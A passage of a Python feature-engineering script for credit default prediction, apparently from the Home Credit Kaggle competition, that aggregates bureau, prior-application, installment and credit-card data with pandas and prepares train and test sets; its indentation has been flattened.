'MONTHS_BALANCE_SIZE': ['mean', 'sum'],
'STATUS_0': ['mean'],
'STATUS_1': ['mean'],
'STATUS_12345': ['mean'],
'STATUS_C': ['mean'],
'STATUS_X': ['mean'],
'CREDIT_ACTIVE_Active': ['mean'],
'CREDIT_ACTIVE_Closed': ['mean'],
'CREDIT_ACTIVE_Sold': ['mean'],
'CREDIT_TYPE_Consumer credit': ['mean'],
'CREDIT_TYPE_Credit card': ['mean'],
'CREDIT_TYPE_Car loan': ['mean'],
'CREDIT_TYPE_Mortgage': ['mean'],
'CREDIT_TYPE_Microloan': ['mean'],
'LL_AMT_CREDIT_SUM_OVERDUE': ['mean'],
'LL_DEBT_CREDIT_DIFF': ['mean'],
'LL_STATUS_12345': ['mean'],
}
BUREAU_ACTIVE_AGG = {
'DAYS_CREDIT': ['max', 'mean'],
'DAYS_CREDIT_ENDDATE': ['min', 'max'],
'AMT_CREDIT_MAX_OVERDUE': ['max', 'mean'],
'AMT_CREDIT_SUM': ['max', 'sum'],
'AMT_CREDIT_SUM_DEBT': ['mean', 'sum'],
'AMT_CREDIT_SUM_OVERDUE': ['max', 'mean'],
'DAYS_CREDIT_UPDATE': ['min', 'mean'],
'DEBT_PERCENTAGE': ['mean'],
'DEBT_CREDIT_DIFF': ['mean'],
'CREDIT_TO_ANNUITY_RATIO': ['mean'],
'MONTHS_BALANCE_MEAN': ['mean', 'var'],
'MONTHS_BALANCE_SIZE': ['mean', 'sum'],
}
BUREAU_CLOSED_AGG = {
'DAYS_CREDIT': ['max', 'var'],
'DAYS_CREDIT_ENDDATE': ['max'],
'AMT_CREDIT_MAX_OVERDUE': ['max', 'mean'],
'AMT_CREDIT_SUM_OVERDUE': ['mean'],
'AMT_CREDIT_SUM': ['max', 'mean', 'sum'],
'AMT_CREDIT_SUM_DEBT': ['max', 'sum'],
'DAYS_CREDIT_UPDATE': ['max'],
'ENDDATE_DIF': ['mean'],
'STATUS_12345': ['mean'],
}
BUREAU_LOAN_TYPE_AGG = {
'DAYS_CREDIT': ['mean', 'max'],
'AMT_CREDIT_MAX_OVERDUE': ['mean', 'max'],
'AMT_CREDIT_SUM': ['mean', 'max'],
'AMT_CREDIT_SUM_DEBT': ['mean', 'max'],
'DEBT_PERCENTAGE': ['mean'],
'DEBT_CREDIT_DIFF': ['mean'],
'DAYS_CREDIT_ENDDATE': ['max'],
}
BUREAU_TIME_AGG = {
'AMT_CREDIT_MAX_OVERDUE': ['max', 'mean'],
'AMT_CREDIT_SUM_OVERDUE': ['mean'],
'AMT_CREDIT_SUM': ['max', 'sum'],
'AMT_CREDIT_SUM_DEBT': ['mean', 'sum'],
'DEBT_PERCENTAGE': ['mean'],
'DEBT_CREDIT_DIFF': ['mean'],
'STATUS_0': ['mean'],
'STATUS_12345': ['mean'],
}
agg_bureau = group(bureau, 'BUREAU_', BUREAU_AGG)
active = bureau[bureau['CREDIT_ACTIVE_Active'] == 1]
agg_bureau = group_and_merge(active,agg_bureau,'BUREAU_ACTIVE_',BUREAU_ACTIVE_AGG)
closed = bureau[bureau['CREDIT_ACTIVE_Closed'] == 1]
agg_bureau = group_and_merge(closed,agg_bureau,'BUREAU_CLOSED_',BUREAU_CLOSED_AGG)
del active, closed; gc.collect()
for credit_type in ['Consumer credit', 'Credit card', 'Mortgage', 'Car loan', 'Microloan']:
type_df = bureau[bureau['CREDIT_TYPE_' + credit_type] == 1]
prefix = 'BUREAU_' + credit_type.split(' ')[0].upper() + '_'
agg_bureau = group_and_merge(type_df, agg_bureau, prefix, BUREAU_LOAN_TYPE_AGG)
del type_df; gc.collect()
for time_frame in [6, 12]:
prefix = "BUREAU_LAST{}M_".format(time_frame)
time_frame_df = bureau[bureau['DAYS_CREDIT'] >= -30*time_frame]
agg_bureau = group_and_merge(time_frame_df, agg_bureau, prefix, BUREAU_TIME_AGG)
del time_frame_df; gc.collect()
sort_bureau = bureau.sort_values(by=['DAYS_CREDIT'])
gr = sort_bureau.groupby('SK_ID_CURR')['AMT_CREDIT_MAX_OVERDUE'].last().reset_index()
gr.rename(columns={'AMT_CREDIT_MAX_OVERDUE': 'BUREAU_LAST_LOAN_MAX_OVERDUE'}, inplace=True)
agg_bureau = agg_bureau.merge(gr, on='SK_ID_CURR', how='left')
agg_bureau['BUREAU_DEBT_OVER_CREDIT'] = \
agg_bureau['BUREAU_AMT_CREDIT_SUM_DEBT_SUM']/agg_bureau['BUREAU_AMT_CREDIT_SUM_SUM']
agg_bureau['BUREAU_ACTIVE_DEBT_OVER_CREDIT'] = \
agg_bureau['BUREAU_ACTIVE_AMT_CREDIT_SUM_DEBT_SUM']/agg_bureau['BUREAU_ACTIVE_AMT_CREDIT_SUM_SUM']
df = pd.merge(df, agg_bureau, on='SK_ID_CURR', how='left')
del agg_bureau, bureau
gc.collect()
prev = pd.read_csv(os.path.join(DATA_DIRECTORY, 'previous_application.csv'))
pay = pd.read_csv(os.path.join(DATA_DIRECTORY, 'installments_payments.csv'))
PREVIOUS_AGG = {
'SK_ID_PREV': ['nunique'],
'AMT_ANNUITY': ['min', 'max', 'mean'],
'AMT_DOWN_PAYMENT': ['max', 'mean'],
'HOUR_APPR_PROCESS_START': ['min', 'max', 'mean'],
'RATE_DOWN_PAYMENT': ['max', 'mean'],
'DAYS_DECISION': ['min', 'max', 'mean'],
'CNT_PAYMENT': ['max', 'mean'],
'DAYS_TERMINATION': ['max'],
# Engineered features
'CREDIT_TO_ANNUITY_RATIO': ['mean', 'max'],
'APPLICATION_CREDIT_DIFF': ['min', 'max', 'mean'],
'APPLICATION_CREDIT_RATIO': ['min', 'max', 'mean', 'var'],
'DOWN_PAYMENT_TO_CREDIT': ['mean'],
}
PREVIOUS_ACTIVE_AGG = {
'SK_ID_PREV': ['nunique'],
'SIMPLE_INTERESTS': ['mean'],
'AMT_ANNUITY': ['max', 'sum'],
'AMT_APPLICATION': ['max', 'mean'],
'AMT_CREDIT': ['sum'],
'AMT_DOWN_PAYMENT': ['max', 'mean'],
'DAYS_DECISION': ['min', 'mean'],
'CNT_PAYMENT': ['mean', 'sum'],
'DAYS_LAST_DUE_1ST_VERSION': ['min', 'max', 'mean'],
# Engineered features
'AMT_PAYMENT': ['sum'],
'INSTALMENT_PAYMENT_DIFF': ['mean', 'max'],
'REMAINING_DEBT': ['max', 'mean', 'sum'],
'REPAYMENT_RATIO': ['mean'],
}
PREVIOUS_LATE_PAYMENTS_AGG = {
'DAYS_DECISION': ['min', 'max', 'mean'],
'DAYS_LAST_DUE_1ST_VERSION': ['min', 'max', 'mean'],
# Engineered features
'APPLICATION_CREDIT_DIFF': ['min'],
'NAME_CONTRACT_TYPE_Consumer loans': ['mean'],
'NAME_CONTRACT_TYPE_Cash loans': ['mean'],
'NAME_CONTRACT_TYPE_Revolving loans': ['mean'],
}
PREVIOUS_LOAN_TYPE_AGG = {
'AMT_CREDIT': ['sum'],
'AMT_ANNUITY': ['mean', 'max'],
'SIMPLE_INTERESTS': ['min', 'mean', 'max', 'var'],
'APPLICATION_CREDIT_DIFF': ['min', 'var'],
'APPLICATION_CREDIT_RATIO': ['min', 'max', 'mean'],
'DAYS_DECISION': ['max'],
'DAYS_LAST_DUE_1ST_VERSION': ['max', 'mean'],
'CNT_PAYMENT': ['mean'],
}
PREVIOUS_TIME_AGG = {
'AMT_CREDIT': ['sum'],
'AMT_ANNUITY': ['mean', 'max'],
'SIMPLE_INTERESTS': ['mean', 'max'],
'DAYS_DECISION': ['min', 'mean'],
'DAYS_LAST_DUE_1ST_VERSION': ['min', 'max', 'mean'],
# Engineered features
'APPLICATION_CREDIT_DIFF': ['min'],
'APPLICATION_CREDIT_RATIO': ['min', 'max', 'mean'],
'NAME_CONTRACT_TYPE_Consumer loans': ['mean'],
'NAME_CONTRACT_TYPE_Cash loans': ['mean'],
'NAME_CONTRACT_TYPE_Revolving loans': ['mean'],
}
PREVIOUS_APPROVED_AGG = {
'SK_ID_PREV': ['nunique'],
'AMT_ANNUITY': ['min', 'max', 'mean'],
'AMT_CREDIT': ['min', 'max', 'mean'],
'AMT_DOWN_PAYMENT': ['max'],
'AMT_GOODS_PRICE': ['max'],
'HOUR_APPR_PROCESS_START': ['min', 'max'],
'DAYS_DECISION': ['min', 'mean'],
'CNT_PAYMENT': ['max', 'mean'],
'DAYS_TERMINATION': ['mean'],
# Engineered features
'CREDIT_TO_ANNUITY_RATIO': ['mean', 'max'],
'APPLICATION_CREDIT_DIFF': ['max'],
'APPLICATION_CREDIT_RATIO': ['min', 'max', 'mean'],
# The following features are only for approved applications
'DAYS_FIRST_DRAWING': ['max', 'mean'],
'DAYS_FIRST_DUE': ['min', 'mean'],
'DAYS_LAST_DUE_1ST_VERSION': ['min', 'max', 'mean'],
'DAYS_LAST_DUE': ['max', 'mean'],
'DAYS_LAST_DUE_DIFF': ['min', 'max', 'mean'],
'SIMPLE_INTERESTS': ['min', 'max', 'mean'],
}
PREVIOUS_REFUSED_AGG = {
'AMT_APPLICATION': ['max', 'mean'],
'AMT_CREDIT': ['min', 'max'],
'DAYS_DECISION': ['min', 'max', 'mean'],
'CNT_PAYMENT': ['max', 'mean'],
# Engineered features
'APPLICATION_CREDIT_DIFF': ['min', 'max', 'mean', 'var'],
'APPLICATION_CREDIT_RATIO': ['min', 'mean'],
'NAME_CONTRACT_TYPE_Consumer loans': ['mean'],
'NAME_CONTRACT_TYPE_Cash loans': ['mean'],
'NAME_CONTRACT_TYPE_Revolving loans': ['mean'],
}
ohe_columns = [
'NAME_CONTRACT_STATUS', 'NAME_CONTRACT_TYPE', 'CHANNEL_TYPE',
'NAME_TYPE_SUITE', 'NAME_YIELD_GROUP', 'PRODUCT_COMBINATION',
'NAME_PRODUCT_TYPE', 'NAME_CLIENT_TYPE']
prev, categorical_cols = one_hot_encoder(prev, ohe_columns, nan_as_category= False)
prev['APPLICATION_CREDIT_DIFF'] = prev['AMT_APPLICATION'] - prev['AMT_CREDIT']
prev['APPLICATION_CREDIT_RATIO'] = prev['AMT_APPLICATION'] / prev['AMT_CREDIT']
prev['CREDIT_TO_ANNUITY_RATIO'] = prev['AMT_CREDIT']/prev['AMT_ANNUITY']
prev['DOWN_PAYMENT_TO_CREDIT'] = prev['AMT_DOWN_PAYMENT'] / prev['AMT_CREDIT']
total_payment = prev['AMT_ANNUITY'] * prev['CNT_PAYMENT']
prev['SIMPLE_INTERESTS'] = (total_payment/prev['AMT_CREDIT'] - 1)/prev['CNT_PAYMENT']
approved = prev[prev['NAME_CONTRACT_STATUS_Approved'] == 1]
active_df = approved[approved['DAYS_LAST_DUE'] == 365243]
active_pay = pay[pay['SK_ID_PREV'].isin(active_df['SK_ID_PREV'])]
active_pay_agg = active_pay.groupby('SK_ID_PREV')[['AMT_INSTALMENT', 'AMT_PAYMENT']].sum()
active_pay_agg.reset_index(inplace= True)
active_pay_agg['INSTALMENT_PAYMENT_DIFF'] = active_pay_agg['AMT_INSTALMENT'] - active_pay_agg['AMT_PAYMENT']
active_df = active_df.merge(active_pay_agg, on= 'SK_ID_PREV', how= 'left')
active_df['REMAINING_DEBT'] = active_df['AMT_CREDIT'] - active_df['AMT_PAYMENT']
active_df['REPAYMENT_RATIO'] = active_df['AMT_PAYMENT'] / active_df['AMT_CREDIT']
active_agg_df = group(active_df, 'PREV_ACTIVE_', PREVIOUS_ACTIVE_AGG)
active_agg_df['TOTAL_REPAYMENT_RATIO'] = active_agg_df['PREV_ACTIVE_AMT_PAYMENT_SUM']/\
active_agg_df['PREV_ACTIVE_AMT_CREDIT_SUM']
del active_pay, active_pay_agg, active_df; gc.collect()
prev['DAYS_FIRST_DRAWING'].replace(365243, np.nan, inplace= True)
prev['DAYS_FIRST_DUE'].replace(365243, np.nan, inplace= True)
prev['DAYS_LAST_DUE_1ST_VERSION'].replace(365243, np.nan, inplace= True)
prev['DAYS_LAST_DUE'].replace(365243, np.nan, inplace= True)
prev['DAYS_TERMINATION'].replace(365243, np.nan, inplace= True)
prev['DAYS_LAST_DUE_DIFF'] = prev['DAYS_LAST_DUE_1ST_VERSION'] - prev['DAYS_LAST_DUE']
approved['DAYS_LAST_DUE_DIFF'] = approved['DAYS_LAST_DUE_1ST_VERSION'] - approved['DAYS_LAST_DUE']
categorical_agg = {key: ['mean'] for key in categorical_cols}
agg_prev = group(prev, 'PREV_', {**PREVIOUS_AGG, **categorical_agg})
agg_prev = agg_prev.merge(active_agg_df, how='left', on='SK_ID_CURR')
del active_agg_df; gc.collect()
agg_prev = group_and_merge(approved, agg_prev, 'APPROVED_', PREVIOUS_APPROVED_AGG)
refused = prev[prev['NAME_CONTRACT_STATUS_Refused'] == 1]
agg_prev = group_and_merge(refused, agg_prev, 'REFUSED_', PREVIOUS_REFUSED_AGG)
del approved, refused; gc.collect()
for loan_type in ['Consumer loans', 'Cash loans']:
type_df = prev[prev['NAME_CONTRACT_TYPE_{}'.format(loan_type)] == 1]
prefix = 'PREV_' + loan_type.split(" ")[0] + '_'
agg_prev = group_and_merge(type_df, agg_prev, prefix, PREVIOUS_LOAN_TYPE_AGG)
del type_df; gc.collect()
pay['LATE_PAYMENT'] = pay['DAYS_ENTRY_PAYMENT'] - pay['DAYS_INSTALMENT']
pay['LATE_PAYMENT'] = pay['LATE_PAYMENT'].apply(lambda x: 1 if x > 0 else 0)
dpd_id = pay[pay['LATE_PAYMENT'] > 0]['SK_ID_PREV'].unique()
agg_prev = group_and_merge(prev[prev['SK_ID_PREV'].isin(dpd_id)], agg_prev,
'PREV_LATE_', PREVIOUS_LATE_PAYMENTS_AGG)
del dpd_id; gc.collect()
for time_frame in [12, 24]:
time_frame_df = prev[prev['DAYS_DECISION'] >= -30*time_frame]
prefix = 'PREV_LAST{}M_'.format(time_frame)
agg_prev = group_and_merge(time_frame_df, agg_prev, prefix, PREVIOUS_TIME_AGG)
del time_frame_df; gc.collect()
del prev; gc.collect()
df = pd.merge(df, agg_prev, on='SK_ID_CURR', how='left')
del agg_prev; gc.collect()
pos = pd.read_csv(os.path.join(DATA_DIRECTORY, 'POS_CASH_balance.csv'))
pos, categorical_cols = one_hot_encoder(pos, nan_as_category= False)
pos['LATE_PAYMENT'] = pos['SK_DPD'].apply(lambda x: 1 if x > 0 else 0)
POS_CASH_AGG = {
'SK_ID_PREV': ['nunique'],
'MONTHS_BALANCE': ['min', 'max', 'size'],
'SK_DPD': ['max', 'mean', 'sum', 'var'],
'SK_DPD_DEF': ['max', 'mean', 'sum'],
'LATE_PAYMENT': ['mean']
}
categorical_agg = {key: ['mean'] for key in categorical_cols}
pos_agg = group(pos, 'POS_', {**POS_CASH_AGG, **categorical_agg})
sort_pos = pos.sort_values(by=['SK_ID_PREV', 'MONTHS_BALANCE'])
gp = sort_pos.groupby('SK_ID_PREV')
temp = pd.DataFrame()
temp['SK_ID_CURR'] = gp['SK_ID_CURR'].first()
temp['MONTHS_BALANCE_MAX'] = gp['MONTHS_BALANCE'].max()
temp['POS_LOAN_COMPLETED_MEAN'] = gp['NAME_CONTRACT_STATUS_Completed'].mean()
temp['POS_COMPLETED_BEFORE_MEAN'] = gp['CNT_INSTALMENT'].first() - gp['CNT_INSTALMENT'].last()
temp['POS_COMPLETED_BEFORE_MEAN'] = temp.apply(lambda x: 1 if x['POS_COMPLETED_BEFORE_MEAN'] > 0
and x['POS_LOAN_COMPLETED_MEAN'] > 0 else 0, axis=1)
temp['POS_REMAINING_INSTALMENTS'] = gp['CNT_INSTALMENT_FUTURE'].last()
temp['POS_REMAINING_INSTALMENTS_RATIO'] = gp['CNT_INSTALMENT_FUTURE'].last()/gp['CNT_INSTALMENT'].last()
temp_gp = temp.groupby('SK_ID_CURR').sum().reset_index()
temp_gp.drop(['MONTHS_BALANCE_MAX'], axis=1, inplace= True)
pos_agg = pd.merge(pos_agg, temp_gp, on= 'SK_ID_CURR', how= 'left')
del temp, gp, temp_gp, sort_pos; gc.collect()
pos = do_sum(pos, ['SK_ID_PREV'], 'LATE_PAYMENT', 'LATE_PAYMENT_SUM')
last_month_df = pos.groupby('SK_ID_PREV')['MONTHS_BALANCE'].idxmax()
sort_pos = pos.sort_values(by=['SK_ID_PREV', 'MONTHS_BALANCE'])
gp = sort_pos.iloc[last_month_df].groupby('SK_ID_CURR').tail(3)
gp_mean = gp.groupby('SK_ID_CURR').mean().reset_index()
pos_agg = pd.merge(pos_agg, gp_mean[['SK_ID_CURR','LATE_PAYMENT_SUM']], on='SK_ID_CURR', how='left')
drop_features = [
'POS_NAME_CONTRACT_STATUS_Canceled_MEAN', 'POS_NAME_CONTRACT_STATUS_Amortized debt_MEAN',
'POS_NAME_CONTRACT_STATUS_XNA_MEAN']
pos_agg.drop(drop_features, axis=1, inplace=True)
df = pd.merge(df, pos_agg, on='SK_ID_CURR', how='left')
pay = do_sum(pay, ['SK_ID_PREV', 'NUM_INSTALMENT_NUMBER'], 'AMT_PAYMENT', 'AMT_PAYMENT_GROUPED')
pay['PAYMENT_DIFFERENCE'] = pay['AMT_INSTALMENT'] - pay['AMT_PAYMENT_GROUPED']
pay['PAYMENT_RATIO'] = pay['AMT_INSTALMENT'] / pay['AMT_PAYMENT_GROUPED']
pay['PAID_OVER_AMOUNT'] = pay['AMT_PAYMENT'] - pay['AMT_INSTALMENT']
pay['PAID_OVER'] = (pay['PAID_OVER_AMOUNT'] > 0).astype(int)
pay['DPD'] = pay['DAYS_ENTRY_PAYMENT'] - pay['DAYS_INSTALMENT']
pay['DPD'] = pay['DPD'].apply(lambda x: 0 if x <= 0 else x)
pay['DBD'] = pay['DAYS_INSTALMENT'] - pay['DAYS_ENTRY_PAYMENT']
pay['DBD'] = pay['DBD'].apply(lambda x: 0 if x <= 0 else x)
pay['LATE_PAYMENT'] = pay['DPD'].apply(lambda x: 1 if x > 0 else 0)  # late means paid after the due date (DPD > 0)
pay['INSTALMENT_PAYMENT_RATIO'] = pay['AMT_PAYMENT'] / pay['AMT_INSTALMENT']
pay['LATE_PAYMENT_RATIO'] = pay.apply(lambda x: x['INSTALMENT_PAYMENT_RATIO'] if x['LATE_PAYMENT'] == 1 else 0, axis=1)
pay['SIGNIFICANT_LATE_PAYMENT'] = pay['LATE_PAYMENT_RATIO'].apply(lambda x: 1 if x > 0.05 else 0)
pay['DPD_7'] = pay['DPD'].apply(lambda x: 1 if x >= 7 else 0)
pay['DPD_15'] = pay['DPD'].apply(lambda x: 1 if x >= 15 else 0)
INSTALLMENTS_AGG = {
'SK_ID_PREV': ['size', 'nunique'],
'DAYS_ENTRY_PAYMENT': ['min', 'max', 'mean'],
'AMT_INSTALMENT': ['min', 'max', 'mean', 'sum'],
'AMT_PAYMENT': ['min', 'max', 'mean', 'sum'],
'DPD': ['max', 'mean', 'var'],
'DBD': ['max', 'mean', 'var'],
'PAYMENT_DIFFERENCE': ['mean'],
'PAYMENT_RATIO': ['mean'],
'LATE_PAYMENT': ['mean', 'sum'],
'SIGNIFICANT_LATE_PAYMENT': ['mean', 'sum'],
'LATE_PAYMENT_RATIO': ['mean'],
'DPD_7': ['mean'],
'DPD_15': ['mean'],
'PAID_OVER': ['mean']
}
pay_agg = group(pay, 'INS_', INSTALLMENTS_AGG)
INSTALLMENTS_TIME_AGG = {
'SK_ID_PREV': ['size'],
'DAYS_ENTRY_PAYMENT': ['min', 'max', 'mean'],
'AMT_INSTALMENT': ['min', 'max', 'mean', 'sum'],
'AMT_PAYMENT': ['min', 'max', 'mean', 'sum'],
'DPD': ['max', 'mean', 'var'],
'DBD': ['max', 'mean', 'var'],
'PAYMENT_DIFFERENCE': ['mean'],
'PAYMENT_RATIO': ['mean'],
'LATE_PAYMENT': ['mean'],
'SIGNIFICANT_LATE_PAYMENT': ['mean'],
'LATE_PAYMENT_RATIO': ['mean'],
'DPD_7': ['mean'],
'DPD_15': ['mean'],
}
for months in [36, 60]:
recent_prev_id = pay[pay['DAYS_INSTALMENT'] >= -30*months]['SK_ID_PREV'].unique()
pay_recent = pay[pay['SK_ID_PREV'].isin(recent_prev_id)]
prefix = 'INS_{}M_'.format(months)
pay_agg = group_and_merge(pay_recent, pay_agg, prefix, INSTALLMENTS_TIME_AGG)
def add_features_in_group(features, gr_, feature_name, aggs, prefix):
for agg in aggs:
if agg == 'sum':
features['{}{}_sum'.format(prefix, feature_name)] = gr_[feature_name].sum()
elif agg == 'mean':
features['{}{}_mean'.format(prefix, feature_name)] = gr_[feature_name].mean()
elif agg == 'max':
features['{}{}_max'.format(prefix, feature_name)] = gr_[feature_name].max()
elif agg == 'min':
features['{}{}_min'.format(prefix, feature_name)] = gr_[feature_name].min()
elif agg == 'std':
features['{}{}_std'.format(prefix, feature_name)] = gr_[feature_name].std()
elif agg == 'count':
features['{}{}_count'.format(prefix, feature_name)] = gr_[feature_name].count()
elif agg == 'skew':
features['{}{}_skew'.format(prefix, feature_name)] = skew(gr_[feature_name])
elif agg == 'kurt':
features['{}{}_kurt'.format(prefix, feature_name)] = kurtosis(gr_[feature_name])
elif agg == 'iqr':
features['{}{}_iqr'.format(prefix, feature_name)] = iqr(gr_[feature_name])
elif agg == 'median':
features['{}{}_median'.format(prefix, feature_name)] = gr_[feature_name].median()
return features
def chunk_groups(groupby_object, chunk_size):
n_groups = groupby_object.ngroups
group_chunk, index_chunk = [], []
for i, (index, df) in enumerate(groupby_object):
group_chunk.append(df)
index_chunk.append(index)
if (i + 1) % chunk_size == 0 or i + 1 == n_groups:
group_chunk_, index_chunk_ = group_chunk.copy(), index_chunk.copy()
group_chunk, index_chunk = [], []
yield index_chunk_, group_chunk_
def add_trend_feature(features, gr, feature_name, prefix):
y = gr[feature_name].values
try:
x = np.arange(0, len(y)).reshape(-1, 1)
lr = LinearRegression()
lr.fit(x, y)
trend = lr.coef_[0]
except:
trend = np.nan
features['{}{}'.format(prefix, feature_name)] = trend
return features
def parallel_apply(groups, func, index_name='Index', num_workers=0, chunk_size=100000):
if num_workers <= 0: num_workers = 8
#n_chunks = np.ceil(1.0 * groups.ngroups / chunk_size)
indices, features = [], []
for index_chunk, groups_chunk in chunk_groups(groups, chunk_size):
with mp.pool.Pool(num_workers) as executor:
features_chunk = executor.map(func, groups_chunk)
features.extend(features_chunk)
indices.extend(index_chunk)
features = pd.DataFrame(features)
features.index = indices
features.index.name = index_name
return features
def trend_in_last_k_instalment_features(gr, periods):
gr_ = gr.copy()
gr_.sort_values(['DAYS_INSTALMENT'], ascending=False, inplace=True)
features = {}
for period in periods:
gr_period = gr_.iloc[:period]
features = add_trend_feature(features, gr_period, 'DPD',
'{}_TREND_'.format(period))
features = add_trend_feature(features, gr_period, 'PAID_OVER_AMOUNT',
'{}_TREND_'.format(period))
return features
group_features = ['SK_ID_CURR', 'SK_ID_PREV', 'DPD', 'LATE_PAYMENT',
'PAID_OVER_AMOUNT', 'PAID_OVER', 'DAYS_INSTALMENT']
gp = pay[group_features].groupby('SK_ID_CURR')
func = partial(trend_in_last_k_instalment_features, periods=[12, 24, 60, 120])
g = parallel_apply(gp, func, index_name='SK_ID_CURR', chunk_size=10000).reset_index()
pay_agg = pay_agg.merge(g, on='SK_ID_CURR', how='left')
def installments_last_loan_features(gr):
gr_ = gr.copy()
gr_.sort_values(['DAYS_INSTALMENT'], ascending=False, inplace=True)
last_installment_id = gr_['SK_ID_PREV'].iloc[0]
gr_ = gr_[gr_['SK_ID_PREV'] == last_installment_id]
features = {}
features = add_features_in_group(features, gr_, 'DPD',
['sum', 'mean', 'max', 'std'],
'LAST_LOAN_')
features = add_features_in_group(features, gr_, 'LATE_PAYMENT',
['count', 'mean'],
'LAST_LOAN_')
features = add_features_in_group(features, gr_, 'PAID_OVER_AMOUNT',
['sum', 'mean', 'max', 'min', 'std'],
'LAST_LOAN_')
features = add_features_in_group(features, gr_, 'PAID_OVER',
['count', 'mean'],
'LAST_LOAN_')
return features
g = parallel_apply(gp, installments_last_loan_features, index_name='SK_ID_CURR', chunk_size=10000).reset_index()
pay_agg = pay_agg.merge(g, on='SK_ID_CURR', how='left')
df = pd.merge(df, pay_agg, on='SK_ID_CURR', how='left')
del pay_agg, gp, pay; gc.collect()
cc = pd.read_csv(os.path.join(DATA_DIRECTORY, 'credit_card_balance.csv'))
cc, cat_cols = one_hot_encoder(cc, nan_as_category=False)
cc.rename(columns={'AMT_RECIVABLE': 'AMT_RECEIVABLE'}, inplace=True)
cc['LIMIT_USE'] = cc['AMT_BALANCE'] / cc['AMT_CREDIT_LIMIT_ACTUAL']
cc['PAYMENT_DIV_MIN'] = cc['AMT_PAYMENT_CURRENT'] / cc['AMT_INST_MIN_REGULARITY']
cc['LATE_PAYMENT'] = cc['SK_DPD'].apply(lambda x: 1 if x > 0 else 0)
cc['DRAWING_LIMIT_RATIO'] = cc['AMT_DRAWINGS_ATM_CURRENT'] / cc['AMT_CREDIT_LIMIT_ACTUAL']
CREDIT_CARD_AGG = {
'MONTHS_BALANCE': ['min'],
'AMT_BALANCE': ['max'],
'AMT_CREDIT_LIMIT_ACTUAL': ['max'],
'AMT_DRAWINGS_ATM_CURRENT': ['max', 'sum'],
'AMT_DRAWINGS_CURRENT': ['max', 'sum'],
'AMT_DRAWINGS_POS_CURRENT': ['max', 'sum'],
'AMT_INST_MIN_REGULARITY': ['max', 'mean'],
'AMT_PAYMENT_TOTAL_CURRENT': ['max', 'mean', 'sum', 'var'],
'AMT_TOTAL_RECEIVABLE': ['max', 'mean'],
'CNT_DRAWINGS_ATM_CURRENT': ['max', 'mean', 'sum'],
'CNT_DRAWINGS_CURRENT': ['max', 'mean', 'sum'],
'CNT_DRAWINGS_POS_CURRENT': ['mean'],
'SK_DPD': ['mean', 'max', 'sum'],
'SK_DPD_DEF': ['max', 'sum'],
'LIMIT_USE': ['max', 'mean'],
'PAYMENT_DIV_MIN': ['min', 'mean'],
'LATE_PAYMENT': ['max', 'sum'],
}
cc_agg = cc.groupby('SK_ID_CURR').agg(CREDIT_CARD_AGG)
cc_agg.columns = pd.Index(['CC_' + e[0] + "_" + e[1].upper() for e in cc_agg.columns.tolist()])
cc_agg.reset_index(inplace= True)
last_ids = cc.groupby('SK_ID_PREV')['MONTHS_BALANCE'].idxmax()
last_months_df = cc[cc.index.isin(last_ids)]
cc_agg = group_and_merge(last_months_df,cc_agg,'CC_LAST_', {'AMT_BALANCE': ['mean', 'max']})
CREDIT_CARD_TIME_AGG = {
'CNT_DRAWINGS_ATM_CURRENT': ['mean'],
'SK_DPD': ['max', 'sum'],
'AMT_BALANCE': ['mean', 'max'],
'LIMIT_USE': ['max', 'mean']
}
for months in [12, 24, 48]:
cc_prev_id = cc[cc['MONTHS_BALANCE'] >= -months]['SK_ID_PREV'].unique()
cc_recent = cc[cc['SK_ID_PREV'].isin(cc_prev_id)]
prefix = 'CC_{}M_'.format(months)
cc_agg = group_and_merge(cc_recent, cc_agg, prefix, CREDIT_CARD_TIME_AGG)
df = pd.merge(df, cc_agg, on='SK_ID_CURR', how='left')
del cc, cc_agg; gc.collect()
def add_ratios_features(df):
df['BUREAU_INCOME_CREDIT_RATIO'] = df['BUREAU_AMT_CREDIT_SUM_MEAN'] / df['AMT_INCOME_TOTAL']
df['BUREAU_ACTIVE_CREDIT_TO_INCOME_RATIO'] = df['BUREAU_ACTIVE_AMT_CREDIT_SUM_SUM'] / df['AMT_INCOME_TOTAL']
df['CURRENT_TO_APPROVED_CREDIT_MIN_RATIO'] = df['APPROVED_AMT_CREDIT_MIN'] / df['AMT_CREDIT']
df['CURRENT_TO_APPROVED_CREDIT_MAX_RATIO'] = df['APPROVED_AMT_CREDIT_MAX'] / df['AMT_CREDIT']
df['CURRENT_TO_APPROVED_CREDIT_MEAN_RATIO'] = df['APPROVED_AMT_CREDIT_MEAN'] / df['AMT_CREDIT']
df['CURRENT_TO_APPROVED_ANNUITY_MAX_RATIO'] = df['APPROVED_AMT_ANNUITY_MAX'] / df['AMT_ANNUITY']
df['CURRENT_TO_APPROVED_ANNUITY_MEAN_RATIO'] = df['APPROVED_AMT_ANNUITY_MEAN'] / df['AMT_ANNUITY']
df['PAYMENT_MIN_TO_ANNUITY_RATIO'] = df['INS_AMT_PAYMENT_MIN'] / df['AMT_ANNUITY']
df['PAYMENT_MAX_TO_ANNUITY_RATIO'] = df['INS_AMT_PAYMENT_MAX'] / df['AMT_ANNUITY']
df['PAYMENT_MEAN_TO_ANNUITY_RATIO'] = df['INS_AMT_PAYMENT_MEAN'] / df['AMT_ANNUITY']
df['CTA_CREDIT_TO_ANNUITY_MAX_RATIO'] = df['APPROVED_CREDIT_TO_ANNUITY_RATIO_MAX'] / df[
'CREDIT_TO_ANNUITY_RATIO']
df['CTA_CREDIT_TO_ANNUITY_MEAN_RATIO'] = df['APPROVED_CREDIT_TO_ANNUITY_RATIO_MEAN'] / df[
'CREDIT_TO_ANNUITY_RATIO']
df['DAYS_DECISION_MEAN_TO_BIRTH'] = df['APPROVED_DAYS_DECISION_MEAN'] / df['DAYS_BIRTH']
df['DAYS_CREDIT_MEAN_TO_BIRTH'] = df['BUREAU_DAYS_CREDIT_MEAN'] / df['DAYS_BIRTH']
df['DAYS_DECISION_MEAN_TO_EMPLOYED'] = df['APPROVED_DAYS_DECISION_MEAN'] / df['DAYS_EMPLOYED']
df['DAYS_CREDIT_MEAN_TO_EMPLOYED'] = df['BUREAU_DAYS_CREDIT_MEAN'] / df['DAYS_EMPLOYED']
return df
df = add_ratios_features(df)
df.replace([np.inf, -np.inf], np.nan, inplace=True)
train = df[df['TARGET'].notnull()]
test = df[df['TARGET'].isnull()]
del df
gc.collect()
labels = train['TARGET']
train = train.drop(columns=['TARGET'])
test = test.drop(columns=['TARGET'])
feature = list(train.columns)
test_df = test.copy()
train_df = train.copy()
train_df['TARGET'] = labels
imputer = SimpleImputer(strategy = 'median')
imputer.fit(train)
train = imputer.transform(train)
